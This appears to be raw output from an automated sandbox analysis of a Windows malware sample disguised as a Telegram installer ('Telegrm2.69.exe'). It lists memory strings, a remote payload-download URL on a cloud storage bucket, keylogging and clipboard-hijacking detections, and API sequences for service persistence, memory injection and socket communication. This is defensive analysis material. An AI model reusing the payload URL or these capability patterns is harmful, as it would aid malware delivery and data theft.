Source: Telegrm2.69.exe, 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: Telegrm2.69.exe, 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
Source: Telegrm2.69.exe, arphaDump64.dll.0.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: Telegrm2.69.exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45codesignca2020.crt0=
Source: Telegrm2.69.exe, 00000000.00000003.2372902793.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2903961019.00000000022F0000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000003.2373019878.000000000076E000.00000004.00000020.00020000.00000000.sdmp, arphaDump64.dll.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: Telegrm2.69.exeString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: Telegrm2.69.exe, 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: Telegrm2.69.exe, 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
Source: Telegrm2.69.exe, 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
Source: Telegrm2.69.exe, 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Telegrm2.69.exe, 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Telegrm2.69.exe, 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: arphaCrashReport64.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
Source: Telegrm2.69.exe, 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
Source: Telegrm2.69.exe, 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
Source: Telegrm2.69.exe, 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
Source: Telegrm2.69.exe, 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
Source: Telegrm2.69.exe, 00000000.00000002.2903961019.00000000022F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jerryrat2024.oss-cn-beijing.aliyuncs.com/arphaDump64.dll
Source: Telegrm2.69.exe, 00000000.00000002.2903961019.00000000022F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jerryrat2024.oss-cn-beijing.aliyuncs.com/arphaDump64.dllrs
Source: Telegrm2.69.exe, arphaDump64.dll.0.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.virtualbox.org/

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Contains functionality to capture and log keystrokes
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: [esc]0_2_030ADEB0
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: [esc]2_2_0000024B6458DEB0
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: [esc]5_2_00000211DC4CDEB0
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030A4210 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalAlloc,EmptyClipboard,GlobalLock,SetClipboardData,GlobalUnWire,GlobalUnWire,CloseClipboard,0_2_030A4210
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030A4210 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalAlloc,EmptyClipboard,GlobalLock,SetClipboardData,GlobalUnWire,GlobalUnWire,CloseClipboard,0_2_030A4210
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B64584210 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalAlloc,EmptyClipboard,GlobalLock,SetClipboardData,GlobalUnWire,GlobalUnWire,CloseClipboard,2_2_0000024B64584210
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4C4210 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalAlloc,EmptyClipboard,GlobalLock,SetClipboardData,GlobalUnWire,GlobalUnWire,CloseClipboard,5_2_00000211DC4C4210
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030A4210 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalAlloc,EmptyClipboard,GlobalLock,SetClipboardData,GlobalUnWire,GlobalUnWire,CloseClipboard,0_2_030A4210
Source: Telegrm2.69.exeBinary or memory string: DirectInput8Create
Source: C:\Users\user\Desktop\Telegrm2.69.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dllJump to behavior
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030A4380 NtdllDefWindowProc_A,SendMessageA,SendMessageA,DestroyWindow,PostQuitMessage,ChangeClipboardChain,SetClipboardViewer,0_2_030A4380
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_02337EF0 socket,connect,send,recv,NtAllocateVirtualMemory,NtAllocateVirtualMemory,recv,closesocket,0_2_02337EF0
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_02337E99 socket,connect,send,recv,NtAllocateVirtualMemory,NtAllocateVirtualMemory,recv,closesocket,0_2_02337E99
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_02337C69 socket,connect,send,recv,NtAllocateVirtualMemory,NtAllocateVirtualMemory,recv,closesocket,0_2_02337C69
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_02DB0020 NtAllocateVirtualMemory,LdrLoadDll,0_2_02DB0020
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_02DB0091 NtAllocateVirtualMemory,LdrLoadDll,0_2_02DB0091
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B64584380 NtdllDefWindowProc_A,SendMessageA,SendMessageA,DestroyWindow,PostQuitMessage,ChangeClipboardChain,SetClipboardViewer,2_2_0000024B64584380
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B626A0C79 WSAStartup,socket,connect,send,recv,NtAllocateVirtualMemory,NtAllocateVirtualMemory,recv,closesocket,2_2_0000024B626A0C79
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B64290020 NtAllocateVirtualMemory,LdrLoadDll,2_2_0000024B64290020
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B64290091 NtAllocateVirtualMemory,LdrLoadDll,2_2_0000024B64290091
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4C4380 NtdllDefWindowProc_A,SendMessageA,SendMessageA,DestroyWindow,PostQuitMessage,ChangeClipboardChain,SetClipboardViewer,5_2_00000211DC4C4380
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DA870C79 WSAStartup,socket,connect,send,recv,NtAllocateVirtualMemory,NtAllocateVirtualMemory,recv,closesocket,5_2_00000211DA870C79
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC1D0020 NtAllocateVirtualMemory,LdrLoadDll,5_2_00000211DC1D0020
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC1D0091 NtAllocateVirtualMemory,LdrLoadDll,5_2_00000211DC1D0091
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030AF8D0 rand,OpenSCManagerA,CreateFileA,CloseHandle,CloseServiceHandle,CreateServiceA,WriteFile,DeleteService,CloseServiceHandle,CloseHandle,CloseServiceHandle,CloseHandle,StartServiceA,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,DeleteFileA,0_2_030AF8D0
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030AF360 GetCurrentProcessId,GetCurrentThreadId,VirtualProtect,VirtualProtect,CreateProcessWithLogonW,VirtualProtect,VirtualProtect,CloseHandle,0_2_030AF360
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030AE6F6 ExitWindowsEx,0_2_030AE6F6
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B6458E6F6 ExitWindowsEx,2_2_0000024B6458E6F6
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4CE6F6 ExitWindowsEx,5_2_00000211DC4CE6F6
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030B01800_2_030B0180
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030A1E800_2_030A1E80
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030A45300_2_030A4530
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030B74B80_2_030B74B8
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030A14C00_2_030A14C0
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030AFCF00_2_030AFCF0
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030A23800_2_030A2380
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030BA2440_2_030BA244
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030B6A700_2_030B6A70
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030ADA900_2_030ADA90
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030C2ADC0_2_030C2ADC
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030B39040_2_030B3904
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030B79380_2_030B7938
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030C39740_2_030C3974
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030C51A40_2_030C51A4
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030B88080_2_030B8808
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030AF8D00_2_030AF8D0
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030B7F240_2_030B7F24
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030B3FA40_2_030B3FA4
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030B664C0_2_030B664C
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030C65200_2_030C6520
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030B84A80_2_030B84A8
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030B6CAC0_2_030B6CAC
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030B24A00_2_030B24A0
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030C5CC00_2_030C5CC0
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_02DC72F00_2_02DC72F0
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_02DC32BC0_2_02DC32BC
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_02DC9BFC0_2_02DC9BFC
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_02DBFB380_2_02DBFB38
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_02DC78DC0_2_02DC78DC
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_02DC60040_2_02DC6004
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_02DB18380_2_02DB1838
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_02DC81C00_2_02DC81C0
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_02DB3EE80_2_02DB3EE8
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_02DC1E580_2_02DC1E58
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_02DC6E700_2_02DC6E70
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_02DC7E600_2_02DC7E60
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_02DBD42B0_2_02DBD42B
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_02DB1D380_2_02DB1D38
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B645845302_2_0000024B64584530
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B64581E802_2_0000024B64581E80
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B645814C02_2_0000024B645814C0
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B6458FCF02_2_0000024B6458FCF0
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B645A65202_2_0000024B645A6520
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B6459664C2_2_0000024B6459664C
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B64597F242_2_0000024B64597F24
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B64593FA42_2_0000024B64593FA4
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B645988082_2_0000024B64598808
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B6458F8D02_2_0000024B6458F8D0
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B645979382_2_0000024B64597938
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B645939042_2_0000024B64593904
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B645901802_2_0000024B64590180
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B645A39742_2_0000024B645A3974
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B645A51A42_2_0000024B645A51A4
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B6459A2442_2_0000024B6459A244
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B645A2ADC2_2_0000024B645A2ADC
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B64596A702_2_0000024B64596A70
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B6458DA902_2_0000024B6458DA90
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B645823802_2_0000024B64582380
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B645A5CC02_2_0000024B645A5CC0
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B645974B82_2_0000024B645974B8
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B64596CAC2_2_0000024B64596CAC
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B645984A82_2_0000024B645984A8
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B645924A02_2_0000024B645924A0
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FF6E2D54FE02_2_00007FF6E2D54FE0
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FF6E2D6C52C2_2_00007FF6E2D6C52C
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FF6E2D63CD42_2_00007FF6E2D63CD4
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FF6E2D67C602_2_00007FF6E2D67C60
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FF6E2D5C1C02_2_00007FF6E2D5C1C0
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FF6E2D701482_2_00007FF6E2D70148
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FF6E2D5EB342_2_00007FF6E2D5EB34
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FF6E2D592B02_2_00007FF6E2D592B0
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FF6E2D6600C2_2_00007FF6E2D6600C
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FF6E2D63FA02_2_00007FF6E2D63FA0
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FF6E2D51FB02_2_00007FF6E2D51FB0
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FF6E2D68F782_2_00007FF6E2D68F78
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FF6E2D6DF542_2_00007FF6E2D6DF54
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FF6E2D6C1002_2_00007FF6E2D6C100
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FF6E2D589102_2_00007FF6E2D58910
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FF6E2D5AE502_2_00007FF6E2D5AE50
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FFDFB8B63F82_2_00007FFDFB8B63F8
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FFDFB8B3FE02_2_00007FFDFB8B3FE0
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B64291D382_2_0000024B64291D38
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B642A1E582_2_0000024B642A1E58
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B642A7E602_2_0000024B642A7E60
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B642A6E702_2_0000024B642A6E70
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B64293EE82_2_0000024B64293EE8
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B642A60042_2_0000024B642A6004
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B642918382_2_0000024B64291838
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B642A78DC2_2_0000024B642A78DC
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B642A81C02_2_0000024B642A81C0
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B642A32BC2_2_0000024B642A32BC
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B642A72F02_2_0000024B642A72F0
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B6429FB382_2_0000024B6429FB38
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B642A9BFC2_2_0000024B642A9BFC
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B6429D42B2_2_0000024B6429D42B
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4C14C05_2_00000211DC4C14C0
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4C45305_2_00000211DC4C4530
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4C1E805_2_00000211DC4C1E80
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4E5CC05_2_00000211DC4E5CC0
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4D74B85_2_00000211DC4D74B8
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4CFCF05_2_00000211DC4CFCF0
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4D24A05_2_00000211DC4D24A0
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4D6CAC5_2_00000211DC4D6CAC
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4D84A85_2_00000211DC4D84A8
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4E65205_2_00000211DC4E6520
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4D664C5_2_00000211DC4D664C
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4D7F245_2_00000211DC4D7F24
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4D3FA45_2_00000211DC4D3FA4
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4D88085_2_00000211DC4D8808
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4CF8D05_2_00000211DC4CF8D0
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4D79385_2_00000211DC4D7938
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4D39045_2_00000211DC4D3904
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4D01805_2_00000211DC4D0180
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4E39745_2_00000211DC4E3974
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4E51A45_2_00000211DC4E51A4
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4DA2445_2_00000211DC4DA244
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4D6A705_2_00000211DC4D6A70
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4E2ADC5_2_00000211DC4E2ADC
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4CDA905_2_00000211DC4CDA90
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4C23805_2_00000211DC4C2380
